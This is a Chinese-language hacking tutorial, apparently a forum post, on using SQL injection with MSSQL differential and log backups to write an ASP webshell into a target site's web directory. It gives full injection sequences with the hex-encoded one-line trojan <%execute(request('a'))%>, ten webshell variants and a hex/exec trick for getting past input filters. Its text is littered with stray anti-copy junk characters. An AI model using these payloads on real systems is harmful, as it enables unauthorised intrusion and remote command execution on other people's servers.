MSsql差异备份总结

admin

差异备份的流程大概这样：
& `  A! Z0 R: l1.完整备份一次(保存位置当然可以改)
- b1 ?' E$ P! Z" o& m$ Zbackup database 库名 to disk = 'c:\ddd.bak';--
' V8 b/ a# N5 U4 |
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
: x% v, s# `: H: f/ A, X! A
3.进行差异备份
6 t# h. f3 f  l; vbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
2 t' `9 O- `. a* C' A0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
2 g$ ]% v8 U& C. X% N# A0 v步骤:
; T* o; H7 m/ C" Y5 C& A
1 I2 J; |2 v: o$ `" Rdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

0 r  x5 `% E" X8 Y/ kcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
) ^0 [) ~  ]  H$ c
: s/ q' w8 n2 m9 L* ?: t( G" c% Y
; ~" O) C& f# q( \5 Iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

# C8 C# S# @  b( S) A% Z1 T+ jdrop table [xiaolu]  -- 删除此表。

! z0 Y, v' c, P8 C2 l: z0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
! V, x4 }1 N+ {" U
$ w3 U2 o: H! b+ ]1 |7 X声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
- S) W: f4 y4 U===============================================================
1 ?. B* q  V# H" E& j7 G! X/ X
6 [+ o8 H$ U9 Y% i, f" \# U2 N我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'
# E" G0 f" A6 w) l: _- T
  r* ]3 B+ u! p: a; Vcreate table [dbo].[dtest] ([cmd] [image]);

3 _* I! Q! q3 E4 e3 Y; hinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

# `; r7 w8 s3 G4 I  q9 Xbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
: g" L, G/ Z7 a; T* _. \5 G5 \
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
* r) N8 L) Z. X" w* U0 X. Z" Z
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
5 B0 z+ ?& f! K
网上还有log增量备份的，我也把他记录一下
- ~9 [+ M7 ?3 U6 F7 f. ]0 x( V$ w; R=====================================================
; v7 C( \! Z9 r1 f$ E* u% Z. Q; l另一种log增量备份技术:
$ G) k! W. T5 D# \
& |( `7 q  z6 B; e2 Y; J';alter database null set RECOVERY FULL--
3 `4 X8 N2 X- t' R' J8 \7 y
';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--
" l" e, Z+ g  e. f" {; K( ?: n! d1 z
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

" Q* z- y6 N: J5 _3 a/ p';backup log null to disk = '备份路径'--

';drop table cmd--
# W6 l* B6 J, @7 Y5 b/ h) c
';alter database XXX set RECOVERY SIMPLE--
: x' B' i  |3 G* _2 b6 n
PS:0x3C2565786563757465287265717565737428226122292
6 X4 b# _4 o0 u; g9253EDA 是一句话小马16进制转来的

: N4 I: k) w6 i5 A说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
8 y) M0 j* h0 d& u& p) k2 \b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
7 M& m& _5 x0 v2 od)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
; }+ l4 v7 h# B1 C4 eh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
/ _# `2 _: E- E+ Q( \3 A1 L: @8 FJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

! T+ l" U( @; G=============================================

! |) _: u( k; G& u% v当遇到差备过滤了/时用这个语句代替

9 d7 {9 a% ~0 M# w" adeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
  G2 w6 D- u7 p/ e$ m
5 K% T& n8 V; p把要执行的语句转16进制然后用exec执行
! d: E* O" z1 y/ o

减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
3 h5 `* l+ ^; \: `& O& }( ^! t! B2 gid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
% i+ p; P) M, w' O( S2
id=1;backup database model to disk='你的路径‘ with differential,format;--
' P2 r( y, Y) F6 F7 ?$ X0 s7 ]

; W$ A+ @- `8 t7 f* D; I
( I& i% B) `& S9 a: C! C6 Q8 wSQL语句清理日志
. B" V$ o' Z% k, i注：test为数据库名
2 G& \0 S' O4 M; e" _8 |* x
--清空日志
DUMP TRANSACTION test WITH NO_LOG
2 k: m' Q8 Z- `3 h. m! V
--截断事务日志
BACKUP LOG test WITH NO_LOG

--收缩数据库
8 B' E; i8 m. h  K+ a7 P5 MDBCC SHRINKDATABASE(test)
' R8 |5 G- G- M" w
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
, C6 [& J& x$ v( E0 ?Select * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
9 y) `0 D0 I( K. _, oEXEC sp_dboption 'test', 'autoshrink', 'TRUE'